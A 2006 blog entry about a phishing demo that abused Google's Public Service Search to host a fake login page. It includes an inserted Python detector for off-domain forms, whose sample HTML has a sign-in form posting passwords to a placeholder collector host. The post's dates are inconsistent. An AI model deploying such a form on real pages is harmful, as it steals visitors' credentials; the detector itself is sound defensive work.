
15 September 2006
  Google Public Search service
Note: I had been holding back on this entry, but since this flaw has gone public elsewhere, I suppose it's okay to post again.

If you go to this website, it claims to give you access to a new Google Plus service. Don't believe it (go ahead and try it though).

Google Public Service Search lets universities and non-profit organizations create a custom search portal that appears to be hosted on Google's own server. The page content is arbitrary (supplied by the organization), so it can contain forms that post to *any* server on the Web.

Eric Farraro has taken advantage of lax filtering of how organizations get to use the service, and has put up a search portal that appears to be a Google service. The form, however, submits to another domain and deceptively collects the visitor's credentials as well. When I visited the site, it appeared as if I was logging into a Google service (since it is Google's domain), but I ended up at a different site entirely.
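The two paragraphs above describe the whole problem: a page served from a trusted host whose form posts somewhere else. The quickest check a reviewer of such a portal can run is to resolve every form's `action` against the page URL and flag the ones whose host differs from the page's host, especially if the form also asks for a password. The script below is an added example written for this post, not code from the original entry or from Eric Farraro's demo; the page URL, the host names and the sample HTML are constructed placeholders, not the real service or demo addresses.

```python
"""Flag HTML forms that submit to a host other than the page's own.

Added example, not code from the original post. It models the abuse the
post describes: a page served from a trusted host whose <form> posts
credentials elsewhere. The HTML below is constructed for illustration;
the host names in it are placeholders, not the real demo.
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormScanner(HTMLParser):
    """Collect every <form> with its resolved action and whether it asks for a password."""

    def __init__(self, page_url):
        super().__init__()
        self.base_url = page_url          # a <base href> may override this
        self.forms = []                   # one dict per <form>, in document order
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)                   # bare attributes come through as None
        if tag == "base" and a.get("href"):
            # <base> changes how relative actions resolve; honour it.
            self.base_url = urljoin(self.base_url, a["href"])
        elif tag == "form":
            # A missing or empty action means "post back to this page".
            action = a.get("action") or ""
            self._current = {
                "action": urljoin(self.base_url, action),
                "method": (a.get("method") or "get").lower(),
                "asks_password": False,
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            if (a.get("type") or "text").lower() == "password":
                self._current["asks_password"] = True

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def _host(url):
    return (urlsplit(url).hostname or "").lower()


def find_offdomain_forms(page_url, html):
    """Return forms whose action host differs from the page's host.

    Each entry is (resolved_action, method, asks_password). A form that
    asks for a password and posts to a foreign host is the phishing pattern
    the post describes.
    """
    scanner = FormScanner(page_url)
    scanner.feed(html)
    page_host = _host(page_url)
    return [
        (f["action"], f["method"], f["asks_password"])
        for f in scanner.forms
        if _host(f["action"]) != page_host
    ]


# Constructed sample: a "search portal" page on a trusted host whose sign-in
# form posts to an unrelated host. All host names are placeholders.
PAGE_URL = "https://search.example.org/custom?client=univ"
SAMPLE_HTML = """
<html><body>
<form action="/search" method="get">
  <input type="text" name="q"> <input type="submit" value="Search">
</form>
<form action="http://collector.example.net/login" method="post">
  Email: <input type="text" name="Email">
  Password: <input type="password" name="Passwd">
  <input type="submit" value="Sign in">
</form>
<form method="post">
  <input type="text" name="feedback">
</form>
</body></html>
"""

if __name__ == "__main__":
    for action, method, pw in find_offdomain_forms(PAGE_URL, SAMPLE_HTML):
        flag = "CREDENTIAL PHISHING" if pw else "off-domain"
        print(f"{flag}: {method.upper()} {action}")
```

Two caveats for anyone using this as a triage check. An off-domain action is a signal, not proof: legitimate portals sometimes post to a central sign-in host, so a hit still needs a human look. And the scan is static, so a page that sets `form.action` from JavaScript at submit time will pass it; for that case you need to watch the actual request in the browser.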

People trust a page on Google's domain to be Google's, and not someone else's. This case shows how someone can use that domain to send unsuspecting visitors, and their credentials, to an entirely different site.

Link to discovery (and details)
Comments on Digg
Google Public Search services

(Thanks, Steve!)

UPDATE (15-Aug 4:05pm): Google has taken down the demo and replaced it with a 403 Forbidden error. Screenshots are on Eric Farraro's site.